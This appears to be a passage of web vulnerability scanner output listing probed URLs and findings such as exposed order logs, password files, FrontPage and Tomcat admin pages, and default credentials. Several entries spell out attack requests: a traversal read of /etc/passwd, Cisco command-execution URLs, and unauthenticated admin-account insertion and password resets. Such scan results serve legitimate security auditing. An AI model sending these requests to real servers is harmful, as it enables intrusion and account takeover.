4336+ /cbms/changepass.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
4337+ /cbms/editclient.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
4338+ /cbms/passgen.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
4339+ /cbms/realinv.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
4340+ /cbms/usersetup.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
4341+ OSVDB-59412: /db/users.dat: upb PB allows the user database to be retrieved remotely.
4342+ /Admin_files/order.log: Selena Sol's WebStore 1.0 exposes order information, http://www.extropia.com/, http://www.mindsec.com/advisories/post2.txt.
4343+ /admin/cplogfile.log: DevBB 1.0 final (http://www.mybboard.com) log file is readable remotely. Upgrade to the latest version.
4344+ /admin/system_footer.php: myphpnuke version 1.8.8_final_7 reveals detailed system information.
4345+ /cfdocs/snippets/fileexists.cfm: Can be used to verify the existance of files (on the same drive info as the web tree/file)
4346+ /cgi-bin/MachineInfo: Gives out information on the machine (IRIX), including hostname
4347+ OSVDB-59646: /chat/!nicks.txt: WF-Chat 1.0 Beta allows retrieval of user information.
4348+ OSVDB-59645: /chat/!pwds.txt: WF-Chat 1.0 Beta allows retrieval of user information.
4349+ OSVDB-53304: /chat/data/usr: SimpleChat! 1.3 allows retrieval of user information.
4350+ /config/: Configuration information may be available remotely.
4351+ /examples/jsp/snp/anything.snp: Tomcat servlet gives lots of host information.
4352+ /cfdocs/snippets/evaluate.cfm: Can enter CF code to be evaluated, or create denial of service see www.allaire.com/security/ technical papers and advisories for info
4353+ /cfide/Administrator/startstop.html: Can start/stop the server
4354+ OSVDB-10598: /cd-cgi/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
4355+ /cgi-bin/handler: Comes with IRIX 5.3 - 6.4; allows to run arbitrary commands
4356+ OSVDB-235: /cgi-bin/webdist.cgi: Comes with IRIX 5.0 - 6.3; allows to run arbitrary commands
4357+ OSVDB-55: /ews/ews/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands. http://www.securityfocus.com/bid/2665.
4358+ OSVDB-5280: /instantwebmail/message.php: Instant Web Mail (http://understroem.kdc/instantwebmail/) is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email.
4359+ OSVDB-3233: /admin/admin_phpinfo.php4: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
4360+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
4361+ OSVDB-5088: /accounts/getuserdesc.asp: Hosting Controller 2002 administration page is available. This should be protected.
4362+ /servlet/SessionManager: IBM WebSphere reconfigure servlet (user=servlet, password=manager). All default code should be removed from servers.
4363+ /level/42/exec/show%20conf: Retrieved Cisco configuration file.
4364+ /livehelp/: LiveHelp may reveal system information.
4365+ /LiveHelp/: LiveHelp may reveal system information.
4366+ /logs/str_err.log: Bmedia error log, contains invalid login attempts which include the invalid usernames and passwords entered (could just be typos & be very close to the right entries).
4367+ OSVDB-6465: /mall_log_files/order.log: EZMall2000 exposes order information, http://www.ezmall2000.com/, see http://www.mindsec.com/advisories/post2.txt for details.
4368+ OSVDB-3204: /megabook/files/20/setup.db: Megabook guestbook configuration available remotely.
4369+ OSVDB-6161: /officescan/hotdownload/ofscan.ini: OfficeScan from Trend Micro allows anyone to read the ofscan.ini file, which may contain passwords.
4370+ /order/order_log_v12.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
4371+ /order/order_log.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
4372+ /orders/order_log_v12.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
4373+ /Orders/order_log_v12.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
4374+ /orders/order_log.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
4375+ /Orders/order_log.dat: Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt
4376+ /session/admnlogin: SessionServlet Output, has session cookie info.
4377+ OSVDB-613: /SiteScope/htdocs/SiteScope.html: The SiteScope install may allow remote users to get sensitive information about the hosts being monitored.
4378+ /servlet/allaire.jrun.ssi.SSIFilter: Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call, see MPSB01-12 http://www.macromedia.com/devnet/security/security_zone/mpsb01-12.html.
4379+ /isapi/count.pl?: AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example.
4380+ /krysalis/: Krysalis pre 1.0.3 may allow remote users to read arbitrary files outside docroot
4381+ /logjam/showhits.php: Logjam may possibly allow remote command execution via showhits.php page.
4382+ /photo/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
4383+ /photodata/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
4384+ OSVDB-5374: /pub/english.cgi?op=rmail: BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely.
4385+ /pvote/ch_info.php?newpass=password&confirm=password%20: PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.
4386+ OSVDB-240: /scripts/wsisa.dll/WService=anything?WSMadmin: Allows Webspeed to be remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0.
4387+ OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
4388+ OSVDB-2225: /thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin: paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.
4389+ OSVDB-3092: /_vti_txt/_vti_cnf/: FrontPage directory found.
4390+ OSVDB-3092: /_vti_txt/: FrontPage directory found.
4391+ OSVDB-3092: /_vti_pvt/deptodoc.btr: FrontPage file found. This may contain useful information.
4392+ OSVDB-3092: /_vti_pvt/doctodep.btr: FrontPage file found. This may contain useful information.
4393+ OSVDB-3092: /_vti_pvt/services.org: FrontPage file found. This may contain useful information.
4394+ OSVDB-28260: /_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611: Gives info about server settings. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0413, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0709, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0710, http://www.securityfocus.com/bid/1608, http://www.securityfocus.com/bid/1174.
4395+ OSVDB-28260: /_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611: Gives info about server settings.
4396+ OSVDB-3092: /_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false: We seem to have authoring access to the FrontPage web.
4397+ OSVDB-3092: /_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false: We seem to have authoring access to the FrontPage web.
4398+ OSVDB-3092: /_vti_bin/_vti_aut/dvwssr.dll: This dll allows anyone with authoring privs to change other users file, and may contain a buffer overflow for unauthenticated users. See also : http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface=1. http://www.microsoft.com/technet/security/bulletin/MS00-025.asp.
4399+ OSVDB-3092: /_vti_bin/_vti_aut/fp30reg.dll: Some versions of the FrontPage fp30reg.dll are vulnerable to a buffer overflow. See http://www.microsoft.com/technet/security/bulletin/http://www.microsoft.com/technet/security/bulletin/ms03-051.asp.asp for details.
4400+ OSVDB-473: /_vti_pvt/access.cnf: Contains HTTP server-specific access control information. Remove or ACL if FrontPage is not being used.
4401+ OSVDB-473: /_vti_pvt/service.cnf: Contains meta-information about the web server Remove or ACL if FrontPage is not being used.
4402+ OSVDB-473: /_vti_pvt/services.cnf: Contains the list of subwebs. Remove or ACL if FrontPage is not being used. May reveal server version if Admin has changed it.
4403+ OSVDB-473: /_vti_pvt/svacl.cnf: File used to store whether subwebs have unique permissions settings and any IP address restrictions. Can be used to discover information about subwebs, remove or ACL if FrontPage is not being used.
4404+ OSVDB-473: /_vti_pvt/writeto.cnf: Contains information about form handler result files. Remove or ACL if FrontPage is not being used.
4405+ OSVDB-473: /_vti_pvt/linkinfo.cnf: IIS file shows http links on and off site. Might show host trust relationships and other machines on network.
4406+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
4407+ OSVDB-48: /doc: The /doc directory is browsable. This may be /usr/doc.
4408+ OSVDB-250: /cgis/wwwboard/wwwboard.cgi: Versions 2.0 Alpha and below have multiple problems. See http://www.securityfocus.com/bid/1795 which could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.
4409+ OSVDB-250: /cgis/wwwboard/wwwboard.pl: Versions 2.0 Alpha and below have multiple problems. See http://www.securityfocus.com/bid/1795 which could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.
4410+ OSVDB-376: /manager/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
4411+ OSVDB-376: /jk-manager/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
4412+ OSVDB-376: /jk-status/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
4413+ OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
4414+ OSVDB-376: /host-manager/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
4415+ OSVDB-2117: /BACLIENT: IBM Tivoli default file found.
4416+ OSVDB-578: /level/16/exec/-///pwd: CISCO HTTP service allows remote execution of commands
4417+ OSVDB-578: /level/16/exec/-///show/configuration: CISCO HTTP service allows remote execution of commands
4418+ OSVDB-578: /level/16: CISCO HTTP service allows remote execution of commands
4419+ OSVDB-578: /level/16/exec/: CISCO HTTP service allows remote execution of commands
4420+ OSVDB-578: /level/16/exec//show/access-lists: CISCO HTTP service allows remote execution of commands
4421+ OSVDB-578: /level/16/level/16/exec//show/configuration: CISCO HTTP service allows remote execution of commands
4422+ OSVDB-578: /level/16/level/16/exec//show/interfaces: CISCO HTTP service allows remote execution of commands
4423+ OSVDB-578: /level/16/level/16/exec//show/interfaces/status: CISCO HTTP service allows remote execution of commands
4424+ OSVDB-578: /level/16/level/16/exec//show/version: CISCO HTTP service allows remote execution of commands
4425+ OSVDB-578: /level/16/level/16/exec//show/running-config/interface/FastEthernet: CISCO HTTP service allows remote execution of commands
4426+ OSVDB-578: /level/16/exec//show: CISCO HTTP service allows remote execution of commands
4427+ OSVDB-578: /level/17/exec//show: CISCO HTTP service allows remote execution of commands
4428+ OSVDB-578: /level/18/exec//show: CISCO HTTP service allows remote execution of commands
4429+ OSVDB-578: /level/19/exec//show: CISCO HTTP service allows remote execution of commands
4430+ OSVDB-578: /level/20/exec//show: CISCO HTTP service allows remote execution of commands
4431+ OSVDB-578: /level/21/exec//show: CISCO HTTP service allows remote execution of commands
4432+ OSVDB-578: /level/22/exec//show: CISCO HTTP service allows remote execution of commands
4433+ OSVDB-578: /level/23/exec//show: CISCO HTTP service allows remote execution of commands
4434+ OSVDB-578: /level/24/exec//show: CISCO HTTP service allows remote execution of commands
4435+ OSVDB-578: /level/25/exec//show: CISCO HTTP service allows remote execution of commands
4436+ OSVDB-578: /level/26/exec//show: CISCO HTTP service allows remote execution of commands
4437+ OSVDB-578: /level/27/exec//show: CISCO HTTP service allows remote execution of commands
4438+ OSVDB-578: /level/28/exec//show: CISCO HTTP service allows remote execution of commands
4439+ OSVDB-578: /level/29/exec//show: CISCO HTTP service allows remote execution of commands
4440+ OSVDB-578: /level/30/exec//show: CISCO HTTP service allows remote execution of commands
4441+ OSVDB-578: /level/31/exec//show: CISCO HTTP service allows remote execution of commands
4442+ OSVDB-578: /level/32/exec//show: CISCO HTTP service allows remote execution of commands
4443+ OSVDB-578: /level/33/exec//show: CISCO HTTP service allows remote execution of commands
4444+ OSVDB-578: /level/34/exec//show: CISCO HTTP service allows remote execution of commands
4445+ OSVDB-578: /level/35/exec//show: CISCO HTTP service allows remote execution of commands
4446+ OSVDB-578: /level/36/exec//show: CISCO HTTP service allows remote execution of commands
4447+ OSVDB-578: /level/37/exec//show: CISCO HTTP service allows remote execution of commands
4448+ OSVDB-578: /level/38/exec//show: CISCO HTTP service allows remote execution of commands
4449+ OSVDB-578: /level/39/exec//show: CISCO HTTP service allows remote execution of commands
4450+ OSVDB-578: /level/40/exec//show: CISCO HTTP service allows remote execution of commands
4451+ OSVDB-578: /level/41/exec//show: CISCO HTTP service allows remote execution of commands
4452+ OSVDB-578: /level/42/exec//show: CISCO HTTP service allows remote execution of commands
4453+ OSVDB-578: /level/43/exec//show: CISCO HTTP service allows remote execution of commands
4454+ OSVDB-578: /level/44/exec//show: CISCO HTTP service allows remote execution of commands
4455+ OSVDB-578: /level/45/exec//show: CISCO HTTP service allows remote execution of commands
4456+ OSVDB-578: /level/46/exec//show: CISCO HTTP service allows remote execution of commands
4457+ OSVDB-578: /level/47/exec//show: CISCO HTTP service allows remote execution of commands
4458+ OSVDB-578: /level/48/exec//show: CISCO HTTP service allows remote execution of commands
4459+ OSVDB-578: /level/49/exec//show: CISCO HTTP service allows remote execution of commands
4460+ OSVDB-578: /level/50/exec//show: CISCO HTTP service allows remote execution of commands
4461+ OSVDB-578: /level/51/exec//show: CISCO HTTP service allows remote execution of commands
4462+ OSVDB-578: /level/52/exec//show: CISCO HTTP service allows remote execution of commands
4463+ OSVDB-578: /level/53/exec//show: CISCO HTTP service allows remote execution of commands
4464+ OSVDB-578: /level/54/exec//show: CISCO HTTP service allows remote execution of commands
4465+ OSVDB-578: /level/55/exec//show: CISCO HTTP service allows remote execution of commands
4466+ OSVDB-578: /level/56/exec//show: CISCO HTTP service allows remote execution of commands
4467+ OSVDB-578: /level/57/exec//show: CISCO HTTP service allows remote execution of commands
4468+ OSVDB-578: /level/58/exec//show: CISCO HTTP service allows remote execution of commands
4469+ OSVDB-578: /level/59/exec//show: CISCO HTTP service allows remote execution of commands
4470+ OSVDB-578: /level/60/exec//show: CISCO HTTP service allows remote execution of commands
4471+ OSVDB-578: /level/61/exec//show: CISCO HTTP service allows remote execution of commands
4472+ OSVDB-578: /level/62/exec//show: CISCO HTTP service allows remote execution of commands
4473+ OSVDB-578: /level/63/exec//show: CISCO HTTP service allows remote execution of commands
4474+ OSVDB-578: /level/64/exec//show: CISCO HTTP service allows remote execution of commands
4475+ OSVDB-578: /level/65/exec//show: CISCO HTTP service allows remote execution of commands
4476+ OSVDB-578: /level/66/exec//show: CISCO HTTP service allows remote execution of commands
4477+ OSVDB-578: /level/67/exec//show: CISCO HTTP service allows remote execution of commands
4478+ OSVDB-578: /level/68/exec//show: CISCO HTTP service allows remote execution of commands
4479+ OSVDB-578: /level/69/exec//show: CISCO HTTP service allows remote execution of commands
4480+ OSVDB-578: /level/70/exec//show: CISCO HTTP service allows remote execution of commands
4481+ OSVDB-578: /level/71/exec//show: CISCO HTTP service allows remote execution of commands
4482+ OSVDB-578: /level/72/exec//show: CISCO HTTP service allows remote execution of commands
4483+ OSVDB-578: /level/73/exec//show: CISCO HTTP service allows remote execution of commands
4484+ OSVDB-578: /level/74/exec//show: CISCO HTTP service allows remote execution of commands
4485+ OSVDB-578: /level/75/exec//show: CISCO HTTP service allows remote execution of commands
4486+ OSVDB-578: /level/76/exec//show: CISCO HTTP service allows remote execution of commands
4487+ OSVDB-578: /level/77/exec//show: CISCO HTTP service allows remote execution of commands
4488+ OSVDB-578: /level/78/exec//show: CISCO HTTP service allows remote execution of commands
4489+ OSVDB-578: /level/79/exec//show: CISCO HTTP service allows remote execution of commands
4490+ OSVDB-578: /level/80/exec//show: CISCO HTTP service allows remote execution of commands
4491+ OSVDB-578: /level/81/exec//show: CISCO HTTP service allows remote execution of commands
4492+ OSVDB-578: /level/82/exec//show: CISCO HTTP service allows remote execution of commands
4493+ OSVDB-578: /level/83/exec//show: CISCO HTTP service allows remote execution of commands
4494+ OSVDB-578: /level/84/exec//show: CISCO HTTP service allows remote execution of commands
4495+ OSVDB-578: /level/85/exec//show: CISCO HTTP service allows remote execution of commands
4496+ OSVDB-578: /level/86/exec//show: CISCO HTTP service allows remote execution of commands
4497+ OSVDB-578: /level/87/exec//show: CISCO HTTP service allows remote execution of commands
4498+ OSVDB-578: /level/88/exec//show: CISCO HTTP service allows remote execution of commands
4499+ OSVDB-578: /level/89/exec//show: CISCO HTTP service allows remote execution of commands
4500+ OSVDB-578: /level/90/exec//show: CISCO HTTP service allows remote execution of commands
4501+ OSVDB-578: /level/91/exec//show: CISCO HTTP service allows remote execution of commands
4502+ OSVDB-578: /level/92/exec//show: CISCO HTTP service allows remote execution of commands
4503+ OSVDB-578: /level/93/exec//show: CISCO HTTP service allows remote execution of commands
4504+ OSVDB-578: /level/94/exec//show: CISCO HTTP service allows remote execution of commands
4505+ OSVDB-578: /level/95/exec//show: CISCO HTTP service allows remote execution of commands
4506+ OSVDB-578: /level/96/exec//show: CISCO HTTP service allows remote execution of commands
4507+ OSVDB-578: /level/97/exec//show: CISCO HTTP service allows remote execution of commands
4508+ OSVDB-578: /level/98/exec//show: CISCO HTTP service allows remote execution of commands
4509+ OSVDB-578: /level/99/exec//show: CISCO HTTP service allows remote execution of commands
4510+ OSVDB-3715: /nsn/env.bas: Novell web server shows the server environment and is vulnerable to cross-site scripting
4511+ OSVDB-3722: /lcgi/lcgitest.nlm: Novell web server shows the server environment
4512+ OSVDB-13404: /com/: Novell web server allows directory listing
4513+ OSVDB-13402: /com/novell/: Novell web server allows directory listing
4514+ OSVDB-13403: /com/novell/webaccess: Novell web server allows directory listing
4515+ OSVDB-4804: //admin/admin.shtml: Axis network camera may allow admin bypass by using double-slashes before URLs.
4516+ OSVDB-4808: /axis-cgi/buffer/command.cgi: Axis WebCam 2400 may allow overwriting or creating files on the system. See http://www.websec.org/adv/axis2400.txt.html for details.
4517+ OSVDB-4806: /support/messages: Axis WebCam allows retrieval of messages file (/var/log/messages). See http://www.websec.org/adv/axis2400.txt.html
4518+ OSVDB-1264: /publisher/: Netscape Enterprise Server with Web Publishing can allow attackers to edit web pages and/or list arbitrary directories via Java applet. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0237.
4519+ OSVDB-134: /cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd: Comes with IRIX 6.2-6.4; allows to run arbitrary commands
4520+ OSVDB-155: /counter/1/n/n/0/3/5/0/a/123.gif: The Roxen Counter may eat up excessive CPU time with image requests.
4521+ OSVDB-2: /iissamples/exair/search/search.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
4522+ OSVDB-2117: /cpanel/: Web-based control panel
4523+ OSVDB-2119: /shopping/diag_dbtest.asp: VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0560, http://www.securityfocus.com/bid/8159
4524+ OSVDB-250: /wwwboard/passwd.txt: The wwwboard password file is browsable. Change wwwboard to store this file elsewhere, or upgrade to the latest version.
4525+ OSVDB-2695: /photo/: My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.
4526+ OSVDB-2695: /photodata/: My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.
4527+ OSVDB-272: /msadc/msadcs.dll: See RDS advisory RFP9902, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1011, http://www.microsoft.com/technet/security/bulletin/MS98-004.asp, http://www.microsoft.com/technet/security/bulletin/MS99-025.asp RFP-9902 BID-29 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d1.htm), CIAC J-054 http://www.ciac.org/ciac/bulletins/j-054.shtml www.securityfocus.com/bid/529
4528+ OSVDB-275: /scripts/tools/newdsn.exe: This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server. http://www.securityfocus.com/bid/1818. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0191. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)
4529+ OSVDB-2813: /admin/database/wwForum.mdb: Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein
4530+ OSVDB-284: /iisadmpwd/aexp2.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
4531+ OSVDB-284: /iisadmpwd/aexp2b.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
4532+ OSVDB-284: /iisadmpwd/aexp3.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
4533+ OSVDB-284: /iisadmpwd/aexp4.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
4534+ OSVDB-284: /iisadmpwd/aexp4b.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
4535+ OSVDB-2842: //admin/aindex.htm: FlexWATCH firmware 2.2 is vulnerable to authentication bypass by prepending an extra '/'. http://packetstorm.linuxsecurity.com/0310-exploits/FlexWATCH.txt
4536+ OSVDB-2922: /admin/wg_user-info.ml: WebGate Web Eye exposes user names and passwords.
4537+ OSVDB-3: /iissamples/exair/search/query.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
4538+ OSVDB-3092: /acceso/: This might be interesting...
4539+ OSVDB-3092: /access-log: This might be interesting...
4540+ OSVDB-3092: /access/: This might be interesting...
4541+ OSVDB-3092: /access_log: This might be interesting...
4542+ OSVDB-3092: /acciones/: This might be interesting...
4543+ OSVDB-3092: /account/: This might be interesting...
4544+ OSVDB-3092: /accounting/: This might be interesting...
4545+ OSVDB-3092: /activex/: This might be interesting...
4546+ OSVDB-3092: /adm/: This might be interesting...
4547+ OSVDB-3092: /admin/: This might be interesting...
4548+ OSVDB-3092: /Administration/: This might be interesting...
4549+ OSVDB-3092: /administration/: This might be interesting...
4550+ OSVDB-3092: /administrator/: This might be interesting...
4551+ OSVDB-3092: /Admin_files/: This might be interesting...
4552+ OSVDB-3092: /advwebadmin/: This might be interesting...probably HostingController, www.hostingcontroller.com
4553+ OSVDB-3092: /Agent/: This might be interesting...
4554+ OSVDB-3092: /Agentes/: This might be interesting...
4555+ OSVDB-3092: /agentes/: This might be interesting...
4556+ OSVDB-3092: /Agents/: This might be interesting...
4557+ OSVDB-3092: /analog/: This might be interesting...
4558+ OSVDB-3092: /apache/: This might be interesting...
4559+ OSVDB-3092: /app/: This might be interesting...
4560+ OSVDB-3092: /applicattion/: This might be interesting...
4561+ OSVDB-3092: /applicattions/: This might be interesting...
4562+ OSVDB-3092: /apps/: This might be interesting...
4563+ OSVDB-3092: /archivar/: This might be interesting...
4564+ OSVDB-3092: /archive/: This might be interesting...
4565+ OSVDB-3092: /archives/: This might be interesting...
4566+ OSVDB-3092: /archivo/: This might be interesting...
4567+ OSVDB-3092: /asp/: This might be interesting...
4568+ OSVDB-3092: /Asp/: This might be interesting...
4569+ OSVDB-3092: /atc/: This might be interesting...
4570+ OSVDB-3092: /auth/: This might be interesting...
4571+ OSVDB-3092: /ayuda/: This might be interesting...
4572+ OSVDB-3092: /backdoor/: This might be interesting...
4573+ OSVDB-3092: /backup/: This might be interesting...
4574+ OSVDB-3092: /bak/: This might be interesting...
4575+ OSVDB-3092: /banca/: This might be interesting...
4576+ OSVDB-3092: /banco/: This might be interesting...
4577+ OSVDB-3092: /bank/: This might be interesting...
4578+ OSVDB-3092: /bbv/: This might be interesting...
4579+ OSVDB-3092: /bdata/: This might be interesting...
4580+ OSVDB-3092: /bdatos/: This might be interesting...
4581+ OSVDB-3092: /beta/: This might be interesting...
4582+ OSVDB-3092: /bin/: This might be interesting...
4583+ OSVDB-3092: /boot/: This might be interesting...
4584+ OSVDB-3092: /buy/: This might be interesting...
4585+ OSVDB-3092: /buynow/: This might be interesting...
4586+ OSVDB-3092: /c/: This might be interesting...
4587+ OSVDB-3092: /cache-stats/: This might be interesting...
4588+ OSVDB-3092: /caja/: This might be interesting...
4589+ OSVDB-3092: /card/: This might be interesting...
4590+ OSVDB-3092: /cards/: This might be interesting...
4591+ OSVDB-3092: /cart/: This might be interesting...
4592+ OSVDB-3092: /cash/: This might be interesting...
4593+ OSVDB-3092: /ccard/: This might be interesting...
4594+ OSVDB-3092: /ccbill/secure/ccbill.log: This might be interesting... CC Bill log file?
4595+ OSVDB-3092: /cdrom/: This might be interesting...
4596+ OSVDB-3092: /cert/: This might be interesting...
4597+ OSVDB-3092: /certificado/: This might be interesting...
4598+ OSVDB-3092: /certificate: This might be interesting...
4599+ OSVDB-3092: /certificates: This might be interesting...
4600+ OSVDB-3092: /cfdocs/exampleapp/email/application.cfm: This might be interesting...
4601+ OSVDB-3092: /cfdocs/exampleapp/publish/admin/addcontent.cfm: This might be interesting...
4602+ OSVDB-3092: /cfdocs/exampleapp/publish/admin/application.cfm: This might be interesting...
4603+ OSVDB-3092: /cfdocs/examples/httpclient/mainframeset.cfm: This might be interesting...
4604+ OSVDB-3092: /client/: This might be interesting...
4605+ OSVDB-3092: /cliente/: This might be interesting...
4606+ OSVDB-3092: /clientes/: This might be interesting...
4607+ OSVDB-3092: /clients/: This might be interesting...
4608+ OSVDB-3092: /communicator/: This might be interesting...
4609+ OSVDB-3092: /compra/: This might be interesting...
4610+ OSVDB-3092: /compras/: This might be interesting...
4611+ OSVDB-3092: /compressed/: This might be interesting...
4612+ OSVDB-3092: /conecta/: This might be interesting...
4613+ OSVDB-3092: /config/checks.txt: This might be interesting...
4614+ OSVDB-3092: /connect/: This might be interesting...
4615+ OSVDB-3092: /console: This might be interesting...
4616+ OSVDB-3092: /correo/: This might be interesting...
4617+ OSVDB-3092: /crypto/: This might be interesting...
4618+ OSVDB-3092: /cuenta/: This might be interesting...
4619+ OSVDB-3092: /cuentas/: This might be interesting...
4620+ OSVDB-3092: /dat/: This might be interesting...
4621+ OSVDB-3092: /data/: This might be interesting...
4622+ OSVDB-3092: /dato/: This might be interesting...
4623+ OSVDB-3092: /datos/: This might be interesting...
4624+ OSVDB-3092: /db/: This might be interesting...
4625+ OSVDB-3092: /dbase/: This might be interesting...
4626+ OSVDB-3092: /demo/: This might be interesting...
4627+ OSVDB-3092: /demos/: This might be interesting...
4628+ OSVDB-3092: /dev/: This might be interesting...
4629+ OSVDB-3092: /devel/: This might be interesting...
4630+ OSVDB-3092: /development/: This might be interesting...
4631+ OSVDB-3092: /dir/: This might be interesting...
4632+ OSVDB-3092: /directory/: This might be interesting...
4633+ OSVDB-3092: /DMR/: This might be interesting...
4634+ OSVDB-3092: /doc-html/: This might be interesting...
4635+ OSVDB-3092: /down/: This might be interesting...
4636+ OSVDB-3092: /download/: This might be interesting...
4637+ OSVDB-3092: /downloads/: This might be interesting...
4638+ OSVDB-3092: /easylog/easylog.html: This might be interesting...
4639+ OSVDB-3092: /ejemplo/: This might be interesting...
4640+ OSVDB-3092: /ejemplos/: This might be interesting...
4641+ OSVDB-3092: /employees/: This might be interesting...
4642+ OSVDB-3092: /envia/: This might be interesting...
4643+ OSVDB-3092: /enviamail/: This might be interesting...
4644+ OSVDB-3092: /error_log: This might be interesting...
4645+ OSVDB-3092: /excel/: This might be interesting...
